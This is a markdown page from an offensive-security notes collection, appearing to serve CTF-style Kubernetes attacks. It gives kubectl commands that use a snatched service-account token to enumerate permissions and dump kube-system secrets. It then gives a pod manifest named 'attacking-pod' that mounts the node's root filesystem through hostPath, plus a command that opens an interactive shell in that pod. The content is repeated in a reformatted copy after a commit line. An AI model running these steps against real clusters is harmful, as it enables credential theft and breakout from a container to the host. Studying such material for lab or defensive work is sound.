killchain-compendium/Exploits/Containers/Kubernetes.md

# Kubernetes

* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well

## Account Token
* Snatch an account token from inside a pod
* Use it via kubectl, watch out for authorizations and namespaces
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 auth can-i --list
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get namespaces
```
* Save secrets from namespaces as yaml file
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -n kube-system
```
* Specify secret
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
```

## Privilege Escalation 
* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
* Show images via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pods
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pod  <image> -o yaml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get nodes -o yaml
```
* Use a found image to create the following yaml file
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: attacking-pod
spec:
  containers:
  - image: <image name in found containers/nodes section> 
    name: <name of image in found containers/nodes section>
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - mountPath: /host
      name: host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
```
* `/` of the node is mounted to `/host` inside the new pod
* Create the pod via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
```
* Run an interactive session on the pod
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Kubernetes`

			`* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well`

			`## Account Token`
			`* Snatch an account token from inside a pod`
			`* Use it via kubectl, watch out for authorizations and namespaces`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list`
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces`
			```
			`* Save secrets from namespaces as yaml file`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml`
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system`
			```
			`* Specify secret`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml`
			```

			`## Privilege Escalation`
			`* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)`
			`* Show images via`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods`
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod <image> -o yaml`
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get nodes -o yaml`
			```
			`* Use a found image to create the following yaml file`
			```yaml
			`apiVersion: v1`
			`kind: Pod`
			`metadata:`
			`name: attacking-pod`
			`spec:`
			`containers:`
			`- image: <image name in found containers/nodes section>`
			`name: <name of image in found containers/nodes section>`
			`command: [ "/bin/sh", "-c", "--" ]`
			`args: [ "while true; do sleep 30; done;" ]`
			`volumeMounts:`
			`- mountPath: /host`
			`name: host`
			`volumes:`
			`- name: host`
			`hostPath:`
			`path: /`
			`type: Directory`
			```
			* `/` of the node is mounted to `/host` inside the new pod
			`* Create the pod via`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f <filename.yaml>`
			```
			`* Run an interactive session on the pod`
			```sh
			`kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash`
			```